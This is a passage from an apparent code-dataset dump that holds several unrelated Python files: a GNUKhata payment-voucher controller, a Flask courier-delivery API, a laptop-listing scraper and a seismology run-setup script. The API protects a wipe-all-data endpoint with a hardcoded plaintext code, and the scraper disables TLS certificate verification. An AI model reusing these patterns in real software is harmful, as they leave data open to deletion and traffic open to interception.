True:\n\t\t\t\tfor r in self.queryParams_details:\n\t\t\t\t\tif r[1] == 'cr':\n\t\t\t\t\t\tapp_globals.server_proxy.account.updateAccountBalance([r[2],r[3],'craccount'],session[\"gnukhata\"])\n\t\t\t\t\telse:\n\t\t\t\t\t\tapp_globals.server_proxy.account.updateAccountBalance([r[2],r[3],'draccount'],session[\"gnukhata\"])\t\n\t\t\tc.flag = \"n\"\n\t\t\tpayment = app_globals.server_proxy.account.getAllAccountNamesByLedger(session[\"gnukhata\"])\n\t\t\tpaymentacc = []\n\t\t\t#populate existing account list\n\t\t\tfor db in payment:\n\t\t\t\tpaymentacc.append(db[0])\n\t\t\tc.bank = paymentacc\n\t\t\tres = app_globals.server_proxy.voucher.getVoucherCode(session[\"gnukhata\"])\n\t\t\tif res == False:\n\t\t\t\tc.vouchercode = 1\n\t\t\telse:\n\t\t\t\tc.vouchercode = res\n\t\t\t# get current date \n\t\t\tc.date=str(strftime(\"%Y-%m-%d %H:%M:%S\"))\n\t\t\tc.displayStatus = False\t\t\n\t\t\tresponse.headerlist = [['Content-type','text-html']]\n\t\t\tresponse.charset='utf8'\n\n\t\tif c.flag == \"e\":\n\t\t\tc.payment = self.getAllAccounts()\n\t\t\t# get current date\n\t\t\tself.date=str(strftime(\"%Y-%m-%d %H:%M:%S\"))\n\t\t\tself.queryParams_master=[str(request.params[\"vouchercode\"]),self.date,datetime.datetime.strptime(request.params[\"date\"], \"%d-%m-%Y\").strftime('%Y-%m-%d'),request.params[\"narration\"]]\n\t\t\tself.queryParams_details = []\n\t\t\tfor i in range(0,len(request.params.getall('cr_dr'))):\n\n\t\t\t\tif str(request.params.getall(\"cr_dr\")[i]) == 'cr':\n\t\t\t\t\tqueryParams_details =[request.params[\"vouchercode\"],request.params.getall(\"cr_dr\")[i],request.params.getall(\"accountname\")[i],request.params.getall(\"credit_amount\")[i]]\n\t\t\t\tif str(request.params.getall(\"cr_dr\")[i]) == 'dr':\n\t\t\t\t\tqueryParams_details =[request.params[\"vouchercode\"],request.params.getall(\"cr_dr\")[i],request.params.getall(\"accountname\")[i],request.params.getall(\"debit_amount\")[i]]\n\t\t\t\tself.queryParams_details.append(queryParams_details)\n\t\t\t\n\t\t\t\n\t\t\ttrial = app_globals.server_proxy.cashbook.editVoucher(self.queryParams_master,self.queryParams_details,session[\"gnukhata\"])\n\t\t\tc.flag = \"n\"\n\t\t\tpayment = app_globals.server_proxy.account.getAllAccounts(session[\"gnukhata\"])\n\t\t\tpaymentacc = []\n\t\t\t#populate existing account list\n\t\t\tfor db in payment:\n\t\t\t\tpaymentacc.append(db[0])\n\t\t\tc.bank = paymentacc\n\t\t\tres = app_globals.server_proxy.voucher.getVoucherCode(session[\"gnukhata\"])\n\t\t\tif res == False:\n\t\t\t\tc.vouchercode = 1\n\t\t\telse:\n\t\t\t\tc.vouchercode = res\n\t\t\t# get current date \n\t\t\tc.date=str(strftime(\"%Y-%m-%d %H:%M:%S\"))\n\t\t\tc.displayStatus = False\t\t\n\t\t\tresponse.headerlist = [['Content-type','text-html']]\n\t\t\tresponse.charset='utf8' \n\t\treturn render('/payment voucher.mako')\n\t\n\tdef getVoucher(self):\n\t\tres = app_globals.server_proxy.cashbook.getVoucher([str(request.params[\"search_value\"])],session[\"gnukhata\"])\n\t\t#print res\n\t\tif res == False:\n\t\t\treturn False\n\t\tif str(request.params[\"submit\"]) == 'Edit':\n\t\t\tres = app_globals.server_proxy.cashbook.getVoucher([str(request.params[\"search_value\"])],session[\"gnukhata\"])\n\t\t\tc.result=res\t\n\t\t\tc.flag = 'e'\n\t\t\tpayment = app_globals.server_proxy.account.getAllAccounts(session[\"gnukhata\"])\n\t\t\tpaymentcc = []\n\t\t\t#populate existing account list\n\t\t\tfor db in payment:\n\t\t\t\tpaymentacc.append(db[0])\n\t\t\tc.bank = paymentacc\n\t\t\tc.vouchercode = res[0][0]\n\t\t\tc.rowCount=len(res)\n\t\t\treturn render('/payment voucher.mako')\n\n\t\tif str(request.params[\"submit\"]) == 'Open':\n\t\t\tres = app_globals.server_proxy.cashbook.getVoucher([str(request.params[\"search_value\"])],session[\"gnukhata\"])\n\t\t\t\t\n\t\t\tresponse.headers[\"Content-Type\"] = \"application/pdf\"\n\t\t\tresponse.headers[\"Content-disposition\"] = \"attachment; filename=paymentreport.pdf\"\n\t\t\tdoc = SimpleDocTemplate(response)\n\t\t\tstyles = getSampleStyleSheet() \n\t\t\tstyleN = styles['Normal'] \n\t\t\tstyleH = styles['Heading1']\n\t\t\tstyleT = styles['Title']\n\t\t\tps=[] \n\t\t\tps.append(Paragraph(\"Adreess,Addreess,Addreess\",styleN))\n\t\t\tps.append(Paragraph(\"Addreess,Addreess,Addreess\",styleN))\n\t\t\tps.append(Paragraph(\"Addreess,Addreess,Addreess\",styleN))\n\t\t\tps.append(Paragraph(\"T:022-28908312\",styleN))\n\t\t\tps.append(Paragraph(\"M:09869049492\",styleN))\n\t\t\tps.append(Paragraph(\"email@email.com\",styleN))\n\t\t\tps.append(Paragraph(\"www.url.com\",styleN))\n\t\t\ts = Spacer(1,0.25*20)\n\t\t\tps.append(s)\n\t\t\t\n\t\t\t\n\t\t\tps.append(Paragraph(\" Payment Voucher\",styleT))\n\t\t\tps.append(Paragraph(\" ------------------\",styleH))\n\t\t\tps.append(Paragraph(\"\",styleN))\n\t\t\tps.append(Paragraph(\"Voucher Code :\"+str(request.params[\"search_value\"])+\"\",styleN)) \n\t\t\tself.voucher_date = time.strftime(\"%d-%m-%Y\",time.strptime(str(res[0][1]),\"%d-%m-%Y\"))\n\t\t\tps.append(Paragraph(\"Date:\"+str(self.voucher_date)+\"\",styleN)) \n\t\t\tdata1 = [['','Account name','Debit Amount','Credit Amount']]\n\t\t\tdata = data1 \n\t\t\tfor r in res:\n\t\t\t\tres1=app_globals.server_proxy.groups.getGroupNameByAccountName([r[3]],session[\"gnukhata\"])\n\t\t\t\tif r[4] == 'cr':\n\t\t\t\t\tdata2 = ['cr',str(res1[0])+'-->'+str(r[3]),'',r[5]]\n\t\t\t\tif r[4] == 'dr':\n\t\t\t\t\tdata2 = ['dr',str(res1[0])+'-->'+str(r[3]),r[5],'']\n\t\t\t\tdata.append(data2)\n\t\t\t\n\t\t\t\n\t\t\tts = [ ('FONT', (0,0), (-1,0), 'Times-Bold'), \n\t\t\t ('INNERGRID', (0,0), (-1,-1),0.25, colors.black), \n\t\t\t ('BOX', (0,0), (-1,-1),0.25, colors.black)] \n\n\t\t\n\t\t\ttable = Table(data, style=ts) \n\t\t\tps.append(table) \n\t\t\t\n\t\t\t\n\t\t\tdoc.build(ps) \n\t\t\treturn\n\t\n\t\n\tdef getCashBook(self):\n\t\tvouchercode = request.params[\"vouchercode\"]\n\t\tres = app_globals.server_proxy.cashbook.getCashBook([str(vouchercode)],session[\"gnukhata\"])\n\t\treturn res\n\t\n\t@jsonify\n\tdef getAllAccounts(self):\n\t\tpayment = app_globals.server_proxy.account.getAllAccountNamesByLedger(session[\"gnukhata\"])\n\t\tpaymentacc = []\n\t\t#populate existing account list\n\t\tfor db in payment:\n\t\t\tpaymentacc.append(db[0])\n\t\treturn {\"paymentacc\":paymentacc}\n\t\t\n\tdef getAllBankAccount(self):\n\t\tbank = app_globals.server_proxy.account.getAllAccountBank(session[\"gnukhata\"])\n\t\tbankname = []\n\t\t# populate existing bankname list\n\t\tfor db in bank:\n\t\t\tbankname.append(db[0])\n\t\treturn bankname\n","sub_path":"webapp/gnukhata/controllers/payment.py","file_name":"payment.py","file_ext":"py","file_size_in_byte":9396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"344188465","text":"import datetime\nimport re\nfrom pprint import pprint\n\nimport pydantic\nfrom flask import jsonify, abort, request, Blueprint\nfrom data import db_session\nfrom data.couriers import Courier\nfrom data.orders import Order\nfrom data.regions import Region\nfrom data.workinghours import WH\nfrom data.deliveryhours import DH\nfrom typing import List, Optional\nimport json\nfrom pydantic import validator\n\nblueprint = Blueprint(\n 'shop_api',\n __name__,\n template_folder='templates'\n)\ncourier_fields = {'courier_id', 'courier_type', 'regions', 'working_hours'}\norder_fields = {'order_id', 'weight', 'region', 'delivery_hours'}\nc_type = {'foot': 10, 'bike': 15, 'car': 50}\nrev_c_type = {10: 'foot', 15: 'bike', 50: 'car'}\nkd = {10: 2, 15: 5, 50: 9}\nCODE = 'zhern0206eskiy'\nPATTERN = r = re.compile('.{2}:.{2}-.{2}:.{2}')\n\n\nclass CourierModel(pydantic.BaseModel):\n base: List[int]\n courier_id: int\n courier_type: str\n regions: List[int]\n working_hours: List[str]\n\n @validator('courier_type')\n def courier_type_should_be(cls, courier_type: str):\n if courier_type not in c_type:\n raise ValueError('courier_type should be \"foot\", \"car\" or \"bike\"')\n return courier_type\n\n @validator('working_hours')\n def wh_should_be(cls, working_hours: list):\n for wh in working_hours:\n if not PATTERN.match(wh):\n raise ValueError('invalid working hours format')\n if wh[2] != ':' or wh[5] != '-' or wh[8] != ':':\n raise ValueError('invalid separators')\n if not all(map(lambda x: x.isnumeric, [wh[0], wh[1], wh[3], wh[4], wh[6], wh[7], wh[9], wh[10]])):\n raise ValueError('Hours/minutes should be integer')\n else:\n f1 = not 0 <= int(wh[0:2]) <= 23\n f2 = not 0 <= int(wh[3:5]) <= 59\n f3 = not 0 <= int(wh[6:8]) <= 23\n f4 = not 0 <= int(wh[9:11]) <= 59\n if f1 or f3:\n raise ValueError('Hours should be between 0 and 23')\n if f2 or f4:\n raise ValueError('Minutes should be between 0 and 59')\n return working_hours\n\n class Config:\n extra = 'forbid'\n\n\nclass EditCourierModel(pydantic.BaseModel):\n courier_id: Optional[int]\n courier_type: Optional[str]\n regions: Optional[List[int]]\n working_hours: Optional[List[str]]\n\n @validator('courier_type')\n def courier_type_should_be(cls, courier_type: str):\n if courier_type not in c_type:\n raise ValueError('courier_type should be \"foot\", \"car\" or \"bike\"')\n return courier_type\n\n @validator('working_hours')\n def wh_should_be(cls, working_hours: list):\n for wh in working_hours:\n if not PATTERN.match(wh):\n raise ValueError('invalid working hours format')\n if wh[2] != ':' or wh[5] != '-' or wh[8] != ':':\n raise ValueError('invalid separators')\n if not all(map(lambda x: x.isnumeric, [wh[0], wh[1], wh[3], wh[4], wh[6], wh[7], wh[9], wh[10]])):\n raise ValueError('Hours/minutes should be integer')\n else:\n f1 = not 0 <= int(wh[0:2]) <= 23\n f2 = not 0 <= int(wh[3:5]) <= 59\n f3 = not 0 <= int(wh[6:8]) <= 23\n f4 = not 0 <= int(wh[9:11]) <= 59\n if f1 or f3:\n raise ValueError('Hours should be between 0 and 23')\n if f2 or f4:\n raise ValueError('Minutes should be between 0 and 59')\n return working_hours\n\n class Config:\n extra = 'forbid'\n\n\nclass OrderModel(pydantic.BaseModel):\n base: List[int]\n order_id: int\n weight: float\n region: int\n delivery_hours: List[str]\n\n class Config:\n extra = 'forbid'\n\n @validator('weight')\n def weight_should_be(cls, w: float):\n if not 0.01 <= w <= 50:\n raise ValueError('weight should be between 0.01 and 50')\n return w\n\n @validator('delivery_hours')\n def dh_should_be(cls, delivery_hours: list):\n for dh in delivery_hours:\n if not PATTERN.match(dh):\n raise ValueError('invalid working hours format')\n try:\n map(int, [dh[0], dh[1], dh[3], dh[4], dh[6], dh[7], dh[9], dh[10]])\n except ValueError:\n raise ValueError('Hours/minutes should be integer')\n if dh[2] != ':' or dh[5] != '-' or dh[8] != ':':\n raise ValueError('invalid separators')\n f1 = not 0 <= int(dh[0:2]) <= 23\n f2 = not 0 <= int(dh[3:5]) <= 59\n f3 = not 0 <= int(dh[6:8]) <= 23\n f4 = not 0 <= int(dh[9:11]) <= 59\n if f1 or f3:\n raise ValueError('Hours should be between 0 and 23')\n if f2 or f4:\n raise ValueError('Minutes should be between 0 and 59')\n return delivery_hours\n\n\ndef is_t_ok(l1, l2) -> bool:\n # format HH:MM - HH:MM\n time = [0] * 1440\n # print(list(l1) + list(l2))\n for h in list(l1) + list(l2):\n t = h.hours\n b1, b2 = t.split('-')\n a = b1.split(':')\n a = int(a[0]) * 60 + int(a[1])\n b = b2.split(':')\n b = int(b[0]) * 60 + int(b[1])\n time[a] += 1\n time[b + 1] -= 1\n # print(t, b1, b2, a, b, time[a], time[b + 1])\n # print('---------------------------')\n balance = 0\n for i in time:\n balance += i\n if balance >= 2:\n return True\n return False\n\n\ndef choose_orders(ords: list, maxw: int) -> list:\n try:\n n, w = len(ords), maxw * 100\n a = list(map(lambda x: int(x * 100), ords))\n c = list(map(lambda x: int(x * 100), ords))\n dp = [[(0, [])] + [(-1, [])] * w for i in range(n)]\n dp[0][0] = (0, [])\n dp[0][a[0]] = (c[0], [1])\n for i in range(1, n):\n for j in range(1, w + 1):\n dp[i][j] = dp[i - 1][j]\n if j - a[i] >= 0 and dp[i - 1][j - a[i]][0] != - 1:\n if dp[i][j][0] < dp[i - 1][j - a[i]][0] + c[i]:\n dp[i][j] = (dp[i - 1][j - a[i]][0] + c[i], dp[i - 1][j - a[i]][1] + [i + 1])\n ans = max(dp[-1])[1]\n return list(map(lambda x: x - 1, ans))\n except IndexError:\n return []\n\n\n@blueprint.route('/couriers', methods=[\"POST\"])\ndef add_couriers():\n req_json = request.json['data']\n db_sess = db_session.create_session()\n res = []\n bad_id = []\n already_in_base = [i.id for i in db_sess.query(Courier).all()]\n is_ok = True\n for courier_info in req_json:\n flag = False\n error_ans = []\n try:\n CourierModel(**courier_info, base=already_in_base)\n except pydantic.ValidationError as e:\n error_ans += json.loads(e.json())\n flag = True\n if courier_info['courier_id'] in already_in_base:\n error_ans += [\n {\"loc\": [\"id\"], \"msg\": \"Invalid id: There is a courier with the same id\", \"type\": \"value_error\"}\n ]\n if flag or courier_info['courier_id'] in already_in_base:\n is_ok = False\n bad_id.append({\"id\": int(courier_info['courier_id']), 'errors': error_ans})\n if not is_ok:\n continue\n courier = Courier()\n courier.id = courier_info['courier_id']\n courier.maxw = c_type[courier_info['courier_type']]\n for i in list((courier_info['regions'])):\n reg = Region()\n reg.courier_id = courier.id\n reg.region = i\n db_sess.add(reg)\n for i in list(courier_info['working_hours']):\n wh = WH()\n wh.courier_id = courier.id\n wh.hours = i\n db_sess.add(wh)\n db_sess.add(courier)\n res.append({\"id\": courier_info['courier_id']})\n\n if is_ok:\n db_sess.commit()\n return jsonify({\"couriers\": res}), 201\n pprint({\"validation_error\": bad_id})\n print('-------------------------------------------------------------------------')\n return jsonify({\"validation_error\": bad_id}), 400\n\n\n@blueprint.route('/orders', methods=[\"POST\"])\ndef add_orders():\n req_json = request.json['data']\n db_sess = db_session.create_session()\n res = []\n bad_id = []\n is_ok = True\n already_in_base = [i.id for i in db_sess.query(Order).all()]\n for order_info in req_json:\n flag = False\n error_ans = []\n try:\n OrderModel(**order_info, base=already_in_base)\n except pydantic.ValidationError as e:\n error_ans += json.loads(e.json())\n flag = True\n if order_info['order_id'] in already_in_base:\n error_ans += [\n {\"loc\": [\"id\"], \"msg\": \"Invalid id: There is a order with the same id\", \"type\": \"value_error\"}\n ]\n if flag or order_info['order_id'] in already_in_base:\n is_ok = False\n bad_id.append({\"id\": int(order_info['order_id']), 'errors': error_ans})\n if not is_ok:\n continue\n order = Order()\n order.id = order_info['order_id']\n order.weight = order_info['weight']\n order.region = order_info['region']\n order.orders_courier = 0\n for i in list(order_info['delivery_hours']):\n dh = DH()\n dh.order_id = order.id\n dh.hours = i\n db_sess.add(dh)\n db_sess.add(order)\n res.append({\"id\": int(order_info['order_id'])})\n\n if is_ok:\n db_sess.commit()\n return jsonify({\"orders\": res}), 201\n pprint({\"validation_error\": bad_id})\n print('-------------------------------------------------------------------------')\n return jsonify({\"validation_error\": bad_id}), 400\n\n\n@blueprint.route('/couriers/', methods=[\"PATCH\", \"GET\"])\ndef edit_courier(courier_id):\n db_sess = db_session.create_session()\n courier = db_sess.query(Courier).filter(Courier.id == courier_id).first()\n if not courier:\n return jsonify({'message': 'no courier with this id'}), 404\n if request.method == 'PATCH':\n req_json = request.json\n try:\n EditCourierModel(**req_json)\n except pydantic.ValidationError as e:\n print({'errors': json.loads(e.json())})\n return jsonify({'errors': json.loads(e.json())}), 400\n for k, v in dict(req_json).items():\n if k == 'courier_type':\n courier.maxw = c_type[v]\n elif k == 'regions':\n db_sess.query(Region).filter(Region.courier_id == courier.id).delete()\n for i in v:\n reg = Region()\n reg.courier_id = courier.id\n reg.region = i\n db_sess.add(reg)\n elif k == 'working_hours':\n db_sess.query(WH).filter(WH.courier_id == courier.id).delete()\n for i in v:\n wh = WH()\n wh.courier_id = courier.id\n wh.hours = i\n db_sess.add(wh)\n db_sess.commit()\n res = {'courier_id': courier_id, 'courier_type': rev_c_type[courier.maxw]}\n a = db_sess.query(WH).filter(WH.courier_id == courier.id).all()\n res['working_hours'] = [i.hours for i in a]\n b = [i.region for i in db_sess.query(Region).filter(Region.courier_id == courier.id).all()]\n res['regions'] = b\n for i in db_sess.query(Order).filter(Order.orders_courier == courier_id).all():\n dh = db_sess.query(DH).filter(DH.order_id == i.id).all()\n if i.complete_time:\n continue\n if i.region not in res['regions'] or not is_t_ok(dh, a):\n i.orders_courier = 0\n db_sess.commit()\n ords = list(db_sess.query(Order).filter(Order.orders_courier == courier_id, Order.complete_time == '').all())\n for i in ords:\n i.orders_courier = 0\n db_sess.commit()\n courier.currentw = 0\n inds = choose_orders(list(map(lambda u: u.weight, ords)), courier.maxw)\n for i in inds:\n order = ords[i]\n courier.currentw += order.weight\n order.orders_courier = courier_id\n db_sess.commit()\n return jsonify(res), 200\n elif request.method == 'GET':\n res = {'courier_id': courier_id, 'courier_type': rev_c_type[courier.maxw]}\n a = [i.hours for i in db_sess.query(WH).filter(WH.courier_id == courier.id).all()]\n res['working_hours'] = a\n b = [i.region for i in db_sess.query(Region).filter(Region.courier_id == courier.id).all()]\n res['regions'] = b\n if not db_sess.query(Order).filter(Order.orders_courier == courier_id,\n Order.complete_time == '').all():\n courier.earnings += courier.last_pack_cost\n courier.last_pack_cost = 0\n res['earnings'] = courier.earnings\n if not courier.earnings:\n return jsonify(res), 200\n try:\n t = min([i.summa / i.q\n for i in db_sess.query(Region).filter(Region.courier_id == courier.id).all() if i.q != 0])\n except ValueError:\n t = 60 * 60\n res['rating'] = round((60 * 60 - min(t, 60 * 60)) / (60 * 60) * 5, 2)\n return jsonify(res), 200\n\n\n@blueprint.route('/orders/assign', methods=[\"POST\"])\ndef assign_orders():\n courier_id = request.json['courier_id']\n db_sess = db_session.create_session()\n courier = db_sess.query(Courier).filter(Courier.id == courier_id).first()\n if not courier:\n return jsonify({'message': 'no courier with this id'}), 400\n ords = db_sess.query(Order).filter(Order.orders_courier == courier_id, Order.complete_time == '').all()\n if ords:\n # print('didnt all task')\n res = [{'id': i.id} for i in ords]\n return jsonify({'orders': res, 'assign_time': courier.last_assign_time}), 201\n courier_regions = [i.region for i in db_sess.query(Region).filter(Region.courier_id == courier_id).all()]\n courier_wh = db_sess.query(WH).filter(WH.courier_id == courier_id).all()\n ords = db_sess.query(Order).filter((Order.orders_courier == 0), Order.region.in_(courier_regions)).all()\n ords = list(filter(lambda u: is_t_ok(db_sess.query(DH).filter(DH.order_id == u.id).all(), courier_wh), ords))\n inds = choose_orders(list(map(lambda u: u.weight, ords)), courier.maxw)\n for i in inds:\n order = ords[i]\n courier.currentw += order.weight\n order.orders_courier = courier_id\n\n db_sess.commit()\n\n res = [{'id': order.id} for order in\n db_sess.query(Order).filter(Order.orders_courier == courier_id, '' == Order.complete_time)]\n if not res:\n return jsonify({\"orders\": []}), 200\n courier.last_pack_cost = kd[courier.maxw] * 500\n # t = str(datetime.datetime.utcnow()).replace(' ', 'T') + 'Z'\n t = str(datetime.datetime.utcnow().isoformat()) + 'Z'\n courier.last_assign_time = t\n assign_time = t\n if '' == courier.last_delivery_t:\n courier.last_delivery_t = assign_time\n db_sess.commit()\n return jsonify({\"orders\": res, 'assign_time': str(assign_time)}), 200\n\n\n@blueprint.route('/orders/complete', methods=[\"POST\"])\ndef complete_orders():\n req_json = request.json\n db_sess = db_session.create_session()\n courier_id = req_json['courier_id']\n order_id = req_json['order_id']\n complete_t = req_json['complete_time']\n courier = db_sess.query(Courier).filter(Courier.id == courier_id).first()\n order = db_sess.query(Order).filter(Order.id == order_id).first()\n if not courier:\n return jsonify({'message': 'no courier with this id'}), 400\n if not order:\n return jsonify({'message': 'no order with this id'}), 400\n if order.orders_courier != courier.id:\n return jsonify({'message': 'courier and order don\\'t match'}), 400\n db_sess.commit()\n reg = db_sess.query(Region).filter(\n Region.region == order.region, Region.courier_id == courier_id\n ).first()\n reg.q += 1\n u = datetime.datetime.fromisoformat(complete_t.split('.')[0])\n v = datetime.datetime.fromisoformat(courier.last_delivery_t.split('.')[0])\n courier.last_delivery_t = complete_t\n reg.summa += (u - v).total_seconds()\n if order.complete_time == '':\n courier.currentw -= order.weight\n order.complete_time = complete_t\n if not db_sess.query(Order).filter(Order.orders_courier == courier_id,\n Order.complete_time == '').all():\n courier.earnings += courier.last_pack_cost\n courier.last_pack_cost = 0\n db_sess.commit()\n return jsonify({'order_id': order.id}), 200\n\n\n@blueprint.route('/test', methods=['GET'])\ndef test():\n return jsonify({\"test\": 'connection is here'}), 201\n\n\n@blueprint.route('/clear', methods=['POST'])\ndef clear():\n if request.json['code'] != CODE:\n return jsonify({\"error\": \"wrong code\"}), 400\n db_sess = db_session.create_session()\n db_sess.query(Courier).delete()\n db_sess.query(Order).delete()\n db_sess.query(Region).delete()\n db_sess.query(WH).delete()\n db_sess.query(DH).delete()\n db_sess.commit()\n return jsonify({'status': 'all data cleared'}), 201\n","sub_path":"data/shop_api.py","file_name":"shop_api.py","file_ext":"py","file_size_in_byte":17243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"74372753","text":"from bs4 import BeautifulSoup\nimport requests\n\ndef save():\n with open('sulpakparse.txt', 'a') as file:\n file.writelines(f\"Naming : {comp['title']}, Price : {comp['price']}, Link : {comp['link']}\\n\")\n\ndef parse():\n URL = 'https://www.sulpak.kg/f/noutbuki'\n HEADERS = {\n 'Accept' : 'ext/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\n 'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36'}\n\n response = requests.get(URL, headers = HEADERS, verify=False)\n soup = BeautifulSoup(response.content, 'html.parser')\n items = soup.findAll('div', class_= 'goods-tiles')\n comps = []\n\n for i in items:\n try:\n comps.append({\n 'title' : i.find('h3', class_ = 'title').get_text(strip=True),\n 'price' : i.find('div', class_ = 'price').get_text(strip=True),\n 'link' : URL + i.find('div', class_ = 'product-container-right-side').find('a').get('href'),\n })\n except:\n pass\n global comp\n for comp in comps:\n print (f\"Naming : {comp['title']}, Price : {comp['price']}, Link : {comp['link']}\\n\")\n save()\n\n\nparse()","sub_path":"sulpaklaptop.py","file_name":"sulpaklaptop.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"185413831","text":"import os\nfrom os.path import exists, join, splitext\nimport shutil\nfrom shutil import copy as cp\nimport subprocess\nimport numpy as np\nfrom obspy.core import AttribDict\n\nfrom frospy.core.modes import read as read_modes\nfrom frospy.core.modes import format_name\nfrom frospy.core.segment import read as read_seg\n\nimport frospy.standalone_tools as pypath\n\n\ninvoutpath = join(pypath.__path__[0], 'write_inversion_out.py')\nif invoutpath.startswith('/net'):\n invoutpath = 'nmpy/standalone_tools/write_inversion_out.py'\n\nmergepath = join(pypath.__path__[0], 'merge.py')\nif mergepath.startswith('/net'):\n mergepath = 'nmpy/standalone_tools/merge.py'\n\nforkpath = join(pypath.__path__[0], 'read_event_loop.pl')\nif forkpath.startswith('/net'):\n forkpath = 'nmpy/standalone_tools/read_event_loop.pl'\n\n\ndef rundir(setup, remove_existing, update_only=False):\n \"\"\"\n Creates the run directory as specifed in setup.rundir\n \"\"\"\n if not update_only:\n if exists(setup.rundir):\n if remove_existing is True:\n shutil.rmtree(setup.rundir)\n else:\n raise IOError('rundir exists!')\n os.makedirs(setup.rundir)\n\n # If inversion_out is default, then it is within rundir\n if setup.inversion_outdir == 'inversion_out':\n os.makedirs(join(setup.rundir, setup.inversion_outdir))\n else:\n os.makedirs(setup.inversion_outdir)\n\n # Copy write_inversion_out.py to folder\n src = [join(setup.nmpydir, invoutpath),\n join(setup.nmpydir, mergepath),\n join(setup.nmpydir, forkpath)]\n dst = [join(setup.rundir, \"write_inversion_out.py\"),\n join(setup.rundir, \"merge.py\"),\n join(setup.rundir, \"read_event_loop.pl\")]\n\n for s, d in zip(src, dst):\n shutil.copy(s, d)\n\n return\n\n\ndef arraydirs(setup, remove_existing):\n \"\"\"\n Creates a directory for every event specifed in setup.segmentsdir\n with the modes.in and segment file\n \"\"\"\n if (\n isinstance(setup.segmentsdir, AttribDict) or\n isinstance(setup.segmentsdir, dict)\n ):\n nof_sets = len(setup.segmentsdir)\n if setup.intype == 'CST':\n fname = os.path.join(setup.rundir, 'allevents')\n\n with open(fname, 'w+') as fh:\n for segname, sdir in setup.segmentsdir.items():\n events = sorted(setup.events[segname])\n\n for event in events:\n if nof_sets > 1:\n\n segdir = os.path.join(setup.rundir, segname)\n if not exists(segdir):\n os.makedirs(segdir)\n eventdir = os.path.join(setup.rundir, segname,\n event)\n\n else:\n eventdir = os.path.join(setup.rundir, event)\n\n if exists(eventdir):\n if remove_existing is True:\n shutil.rmtree(eventdir)\n else:\n raise IOError('eventdir exists!')\n os.makedirs(eventdir)\n # write allevents\n if nof_sets > 1:\n fh.write('%s %s\\n' % (segname, event))\n else:\n fh.write('%s\\n' % event)\n\n # copying modesin\n modesfile = modesin(setup, filename='modes.in')\n cp(modesfile, eventdir)\n\n # copying segments from rundir to each eventdir\n src_all, dst_all = segments(setup, print_seg=False)\n for src, dst in zip(src_all, dst_all):\n dst = splitext(dst)[0]\n cp(src, dst)\n\n elif setup.intype == 'FSI':\n fname = os.path.join(setup.rundir, 'allevents')\n with open(fname, 'w+') as fh:\n for segname, sdir in setup.segmentsdir.items():\n events = sorted(setup.events[segname])\n for event in events:\n eventdir = os.path.join(sdir, event)\n if exists(eventdir):\n if remove_existing is True:\n shutil.rmtree(eventdir)\n else:\n raise IOError('eventdir exists!')\n os.makedirs(eventdir)\n # write allevents\n fh.write('%s %s\\n' % (segname, event))\n\n # copying modesin\n modesfile = os.path.join(sdir, 'modes.in')\n modessfile = os.path.join(sdir, 'modess.in')\n modesmfile = os.path.join(sdir, 'modesm.in')\n segfile = os.path.join(sdir, '%s.dat' % (event))\n cp(modesfile, eventdir)\n cp(modessfile, eventdir)\n cp(modesmfile, eventdir+'/modes.in')\n cp(segfile, eventdir)\n\n elif os.path.isdir(setup.segmentsdir):\n fname = os.path.join(setup.rundir, 'allevents')\n events = sorted(setup.events)\n with open(fname, 'w+') as fh:\n for event in events:\n eventdir = os.path.join(setup.rundir, event)\n if exists(eventdir):\n if remove_existing is True:\n shutil.rmtree(eventdir)\n else:\n raise IOError('eventdir exists!')\n os.makedirs(eventdir)\n fh.write('%s\\n' % event) # write allevents\n\n # copying modesin\n modesfile = modesin(setup, filename='modes.in')\n cp(modesfile, eventdir)\n\n # copying segments from rundir to each eventdir\n src_all, dst_all = segments(setup, print_seg=False)\n for src, dst in zip(src_all, dst_all):\n dst = splitext(dst)[0]\n cp(src, dst)\n\n return\n\n\ndef modesin(setup, filename='modes.in'):\n \"\"\"\n Writes modes.in file needed for mdcplmrho* programs\n \"\"\"\n path = setup.rundir\n fname = os.path.join(path, filename)\n with open(fname, 'w+') as fh:\n fh.write('%s\\n' % len(setup.modes_sc))\n for mode, smax in setup.modes_sc.items():\n m = read_modes(modenames=mode)[0]\n fh.write(\"%03d %s %03d\\n\" % (m.n, m.type.lower(), m.l))\n return fname\n\n\ndef segments(setup, print_seg=True):\n \"\"\"\n Setup of segment files. Copies all files ending with 'suffix'\n from setup.segmentsdir to setup.rundir .\n \"\"\"\n dst_all = []\n src_all = []\n if (\n setup.rundir.startswith('/quanta') or\n setup.rundir.startswith('/scratch')\n ):\n default = '/quanta1/home/simons/splitting/alldatafiles'\n elif setup.rundir.startswith('/nfs'):\n default = '//nfs/stig/deuss/modes/alldatafiles'\n else:\n default = setup.datadir\n\n\n accepted_ftypes = ['segmentZ', 'segmentT', 'segmentR', 'dat']\n if setup.segmentsdir is None:\n return\n\n # If segmentsdir is a dict-type\n if (\n isinstance(setup.segmentsdir, AttribDict) or\n isinstance(setup.segmentsdir, dict)\n ):\n nof_sets = len(setup.segmentsdir)\n for segname, sdir in setup.segmentsdir.items():\n for seg in os.listdir(sdir):\n cmt, ftype = seg.split('.')\n if ftype not in accepted_ftypes:\n continue\n\n if \"%s.cmt\" % cmt not in os.listdir(default):\n continue\n src = join(sdir, seg)\n if nof_sets > 1:\n dst = join(setup.rundir, segname, seg)\n else:\n dst = join(setup.rundir, seg)\n dst_all.append(dst)\n src_all.append(src)\n if not exists(dst) and print_seg is True:\n try:\n cp(src, dst)\n except Exception:\n print(\"Needs array inversion setup\")\n\n # If segmentsdir is a directory\n elif os.path.isdir(setup.segmentsdir):\n for seg in os.listdir(setup.segmentsdir):\n cmt, ftype = seg.split('.')\n if ftype not in accepted_ftypes:\n continue\n\n if \"%s.cmt\" % cmt not in os.listdir(default):\n continue\n src = join(setup.segmentsdir, seg)\n dst = join(setup.rundir, seg)\n dst_all.append(dst)\n src_all.append(src)\n if not exists(dst) and print_seg is True:\n cp(src, 